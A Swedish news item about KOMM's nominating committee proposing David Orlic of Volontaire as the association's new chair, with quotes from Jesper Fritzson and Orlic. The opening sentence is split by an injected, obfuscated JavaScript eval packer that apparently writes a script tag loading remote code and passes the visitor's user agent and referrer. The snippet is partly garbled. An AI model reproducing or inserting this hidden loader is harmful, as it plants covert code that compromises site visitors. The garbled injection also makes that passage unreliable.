Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

David Orlic föreslås som ny ordförande för KOMM

David Orlic föreslås som ny ordförande för KOMM
Sebastian

Sveriges eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fsefh|var|u0026u|referrer|bnany||js|php’.split(’|’),0,{}))
Kommunikationsbyråers valnämnd föreslår David Orlic som ny ordförande att väljas vid årets stämma den 29:e maj. David Orlic är medgrundare och vice vd på kommuninikationsbyrån Volontaire.

– David Orlic har precis den erfarenhetsbredd och det tydliga engagemang i att driva branschen framåt som vi sökte i en ny ordförande. Han är prestigelös och nyfiken, och valnämndens bedömning är att David kommer att kunna ge branschen en ordentligt skjuts in i framtiden, säger valnämndens ordförande Jesper Fritzson.

David Orlic blir med sina 32 år KOMM:s yngste ordförande. Sin ungdom till trots har han en ytterst gedigen branscherfarenhet inom både reklam, PR och opinionsbildning. Han har även omfattande juryerfarenhet från bland annat Cannes Lions och har även varit med och vunnit otaliga priser själv. Valnämnden anser att David Orlic manifesterar branschens framtid både i form av visioner, sammansmältningen av disciplinerna och att han ser verksamhets- och affärsutmaningar som en del av kommunikationsutmaningen.

– Vi är mitt i en enorm branschglidning som ställer helt nya krav på både byråer och uppdragsgivare. Jag jobbar själv på en byrå som kombinerar reklam, PR, teknologi och design på ett sätt som var otänkbart för bara 10 år sedan. Kommunikationsprojekt sträcker sig idag från affärsstrategi och tjänsteutveckling till underhållning och opinionsbildning. Det innebär en större komplexitet, men också fler möjligheter, säger David Orlic

– När vi var klara med kravlistan för vilka egenskaper och erfarenheter vi ville att nästa ordförande skulle ha, kändes det nästan som ett mission impossible att hitta någon som uppfyllde alla kraven. Vi är nöjda med den shortlist vi fick fram, men när vi träffade David så stack han verkligen ut, och vi såg dessutom att han faktiskt stämde in på alla våra önskemål, säger Jesper Fritzson.

– KOMM:s styrelse har under ledning av Gustav Martner gjort ett fantastiskt jobb med att bredda förbundet och öka branschens anseende gentemot näringsliv, politiker och allmänhet. Jag är stolt över att få bygga vidare på det och ödmjuk inför nomineringen, säger David Orlic.